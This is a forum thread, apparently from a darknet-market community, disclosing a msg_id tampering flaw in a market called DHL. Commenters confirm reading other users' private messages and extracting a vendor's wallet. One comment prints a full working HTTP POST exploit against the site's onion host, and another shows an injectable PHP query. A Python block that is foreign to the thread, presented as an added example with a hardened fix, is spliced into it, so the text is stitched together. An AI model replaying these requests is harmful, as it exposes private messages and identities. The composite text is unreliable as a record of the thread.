DHL Market Security Part 2 - All Private Messages Leaked

As part of our campaign of holding DHL accountable for their security vulnerabilities - we are now disclosing that the market contains a very simple bug that allows anybody to read any message on the site.

The details are here:

https://gist.github.com/anonymous/97d1e2319b78210606d41f3309aa4c21

If you're a researcher have a go at the site - almost none of the form parameters on the site are validated - this site is incredibly horrible and nobody should be using it.

The administrators of DHL have not replied to any of our previous reports nor messages and it has been over 48 hours. They have promised to give a "truthful" response and not delivered, and referred to previous vulnerability disclosures as "reddit drama" and those reporting bugs as "clowns".

One more note - we are not going to put up with shit from admins, paid spokespeople or shill moderators any longer. We are no longer reporting vulnerabilities as we find them and we are sitting on many more - keep this in mind before you attempt to jump in again and deny or attempt to FUD in this sub.

Props to you-know-who for the tips, everyone working on the DNMs together and the peeps who have PM'd and messaged.


Comments


[83 Points] ostespiseren:

Unmod wombat, ban pelican from the subreddit for admitting to paid shilling, remove DHL from the list.


[50 Points] illegaltorrents:

Is Part 3 where you reveal that wombat is on the DHL support staff?


[31 Points] Egyptianscirocah:

I honestly hope you reconsider holding back bugs because of these mods. You should create your own subreddit or somewhere for people to see these.

I am trying to find my next replacement market that actually takes security seriously.


[26 Points] BlueWilderness:

i just pulled some pms using this https://paste.ee/p/sIczl


[20 Points] None:

P-please u/t0mcheck d-don't leave us. Not all of us are sucking mod dick. These guys are shitbags that have been doing everything they can to discredit you. I have no clue if any of this is real or not but judging by DHL's (response) or lack thereof you hit them. It is absolutely pathetic what the mods have done here including the vendors/site owners.


[20 Points] None:

[deleted]


[18 Points] AI-Bourne:

You are a savage t0mcheck god damn bro slow down, give em some time to breathe.


[14 Points] travis-:

Well I'm sure wombat thinks this is all normal and to just wait, it's fine.


[8 Points] None:

Thank you again mate.

Let's see how the usual shills try to deflect that.

Wombat, Pelican - over to you boys


[10 Points] TenXanTim:

This is just fucking disgusting /u/DHL-1 /u/DHL-3

Admins and staff alike at DHL should be ASHAMED of themselves.


[10 Points] DNSecurityConsultant:

Found a vendor's Bitcoin wallet with this:

Proof: http://matrixtxri745dfw.onion/neo/uploads/170803/MATRIX_191314_ucu_aaaaaaaa.png

Address: http://darkheroesq46awl.onion/account/message_view?msg_id=234248


[7 Points] Cocinacowboy:

Has anyone extracted any messages?


[9 Points] zysr90:

t0mcheck is making wombat look more ridiculous by the day


[4 Points] kryptikmind:

Security is key, especially with how markets are being taken down currently.


[5 Points] DabbinOnMyboysD:

holy shit. Nice job Tom, i really appreciate you looking out for this community. I hope you stick around. Also nice job finding one of Peli's messages. I hope he's shitting himself.


[6 Points] Clix828:

Word man! I'll say this again, You are TRULY a HIGH valued asset to this community. Ignore the FUD, you are making it safer for us!


[6 Points] SpeedflyChris:

Fucking seriously? They made it that easy?


[5 Points] mjmedstarved:

slowclap


[5 Points] DNSecurityConsultant:

I can confirm this vulnerability. Fantastic!


[5 Points] DNSecurityConsultant:

Looks like my post might get buried at the bottom but I also found some vulnerabilities in DHL today: https://www.reddit.com/r/DarkNetMarkets/comments/6rfec4/dhl_security_advisory_url_redirect_captcha_bypass/


[5 Points] CipherYou:

Please note: previously the top comment on this thread was a highlighted comment from a moderator with the following:

when a vendor for example can confirm that tomcheck knows the contents of their messages then we can add one of those red warnings for dhl.

This comment has since been removed without explanation or update. If you visited this thread while this moderator comment was top comment and came away with the impression that the claims made in this post were not true or verified then you likely had the wrong impression.

The comment was deleted rather than retracted, and we have no update from the moderators on why it was deleted rather than retracted or updated.

Based on the absence of this latest security incident from the list of warnings against this market I believe that it is safe to assume that the moderators are not yet satisfied that this issue has been verified, while they are also no longer also requesting verification which means this post is currently in a state of moderator limbo.

/u/t0mcheck /u/wombat2combat


[3 Points] q123rumble:

... i would add my .02 BTC but no one would give a fuck ... so here i sit with my popcorn in one hand and my dick in another ;-)


[3 Points] justinherass99:

ROFL that's so fucking bad.


[3 Points] zysr90:

have my babies t0mcheck


[3 Points] tweaker_:

Don't ignore this man. Whether a bug is innocuous or harmful, the presence of technical flaws in a system (especially one that exists for the sole purpose of illegal activity) is indicative of the level of competence of those running the show. Attention to detail is important and the admins of DHL should be grateful the community is trying to help.

I've got a bit of skepticism that they'd want to suppress public disclosure of any known problems as to not affect profitability, and I'd bet that someone somewhere is getting paid to help silence any opposition.


[2 Points] elfer90:

for real, we the people


[2 Points] mrfloridamolly99:

--"On the message reply page there is a hidden field in the form called msg_id which is a unique and sequential message identifier. When replying to a message it will use this message ID to identify which message you are replying to. If you change it to any other message id, you will be able to reply to that message (another user's message) and you will then be given access to that message in your list of messages."--

THIS DOES NOT WORK. I am not a hacker but I tried this to attempt to verify myself.

When attempting to change msg_id the output is -INVALID MESSAGE NUMBER-

Maybe they patched it already or I'm not using the appropriate pentest tools or maybe it's bullshit ??


[2 Points] 1499:

The popcorn's popping


[2 Points] sharpshooter789:

Looks like DHL fixed the bug. Well, at least a GET request from the browser doesn't work anymore. I did see Tom provide a POST request. If I get some time I may bust out burpsuite and see if that will work.

edit: I should add this is a rookie mistake. Using hidden fields to hide data is as amateur as it gets.


[1 Points] None:

thx for the heart attack... did you also try to login to different accounts? magically i got auto-logged off without even being logged in


[1 Points] 1ugly:

Yeah, they're all leaked, they're all pgp'd automatically.


[1 Points] xan-bar-fan:

Sounds like you guys are having a hard time taking down this market.


[1 Points] None:

Can some1 screenshot whats going on here?: http://talismanrestz7mr.onion/index.php?topic=13021.msg202352;topicseen#msg202352


[1 Points] klookass:

Which market should we be using instead? The more i read about dream, the more it makes me NOT wanna use it. Not because of any LE infiltration, but coz of general sloppiness.


[1 Points] None:

[deleted]


[1 Points] midnightmodders:

You're doing great work! Thanks for informing the community, if I may ask have you ever tested CGMC for security vulnerabilities? Would love to know.


[1 Points] sharpshooter789:

Scratch my previous post. This exploit does indeed work. Had to use BurpSuite and perform an HTTP POST.

POST /account/message HTTP/1.1
Host: darkheroesq46awl.onion
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:31.0) Gecko/20100101 Firefox/31.0 Iceweasel/31.7.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://darkheroesq46awl.onion/account/message_view?msg_id=247563
Cookie: PHPSESSID=<CUT>; auth_hash=<CUT>
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 75

msg_id=244359&recipient=tomcheck&reply=FEED+ME+MSG+DUMP%21&submit=Add+Repl

Here is a partial screenshot of t0m's message thread (id=244359).

http://ibb.co/bQZBGa

Also a bonus. Someone pulled up checkpoint's thread (id=234248). I got a screenshot of that too

http://ibb.co/j3SsNF


[1 Points] dncrumbs:

So that's two sites now that let anyone read any private message they want? I'd really love to see their code.

$result = mysql_query("SELECT * FROM messages WHERE id={$_POST['id']}");

"Oops, we forgot the mysql_real_escape_string."

$result = mysql_query("SELECT * FROM messages WHERE id=" . mysql_real_escape_string($_POST['id']));

"There! Safe."
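An added example (not code from the post, the gist it links, or DHL) that models the reply-page bug quoted earlier in the thread and the snippet above, in Python against an in-memory sqlite table: the "escaped" query is still an insecure direct object reference, because nothing ties msg_id to the logged-in user, while the hardened handlers validate the id and only act when the session user is a participant in that message. The table, column names, usernames and message ids are all constructed for the example.

```python
import sqlite3


def make_db() -> sqlite3.Connection:
    """Constructed sample data (not real DHL data): two private messages."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE messages (id INTEGER PRIMARY KEY, sender TEXT, recipient TEXT, body TEXT)")
    db.executemany(
        "INSERT INTO messages VALUES (?, ?, ?, ?)",
        [(244359, "alice", "tomcheck", "hello tom"), (234248, "vendor1", "buyer7", "shipping details")],
    )
    return db


def view_message_vulnerable(db, msg_id):
    """Equivalent of the 'fixed' PHP above: parameterised, so no SQL injection,
    but the only input is the form's msg_id. Any existing (sequential) id is
    returned no matter who is logged in: that is the IDOR the thread describes."""
    return db.execute("SELECT sender, recipient, body FROM messages WHERE id = ?", (msg_id,)).fetchone()


def view_message_hardened(db, session_user, raw_msg_id):
    """Reject anything that is not an integer, then fetch the row only if the
    session user is the sender or recipient. Unauthorised ids look exactly like
    non-existent ones (None), so the endpoint cannot be used to enumerate ids."""
    try:
        msg_id = int(raw_msg_id)
    except (TypeError, ValueError):
        return None
    return db.execute(
        "SELECT sender, recipient, body FROM messages WHERE id = ? AND (sender = ? OR recipient = ?)",
        (msg_id, session_user, session_user),
    ).fetchone()


def add_reply_hardened(db, session_user, raw_msg_id, text):
    """The reply handler is where the reported bug lived: a hidden msg_id chose
    the thread. Resolve the thread through the same ownership check first, so a
    tampered hidden field cannot attach the user to someone else's conversation."""
    original = view_message_hardened(db, session_user, raw_msg_id)
    if original is None:
        return False  # reject, the same way the site answers "INVALID MESSAGE NUMBER"
    sender, recipient, _ = original
    other_party = recipient if sender == session_user else sender
    db.execute("INSERT INTO messages (sender, recipient, body) VALUES (?, ?, ?)", (session_user, other_party, text))
    db.commit()
    return True
```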


[-2 Points] wombat2combat:

when a vendor for example can confirm that tomcheck knows the contents of their messages then we can add one of those red warnings for dhl.

edit: a user apparently posted a message long dump from dhl, which could suffice as proof for the message leak [although tomcheck complained about dream getting a warning for a list of compromised accounts that surfaced from a pastebin post, now it is a similar situation with the dhl messages]. we superlist mods will now discuss how to proceed with the new evidence.


[-1 Points] 1ugly:

Yeah, they're all leaked, they're all pgp'd automatically.


[-1 Points] transamerican2:

@t0mcheck: only one thought if you don't mind:
in the good ol' SR-days pen-testers like you would've sent pm's to the site admins FIRST to report the vulnerabilities they had found. For sure they also asked for some bucks for their help (which is legit!!), but first they gave the market-admins the chance to solve the probs before they leaked everything in the wild! Did you do this too?? If not, you are anything but a helper of our movement! jmtc, stay safe all of you!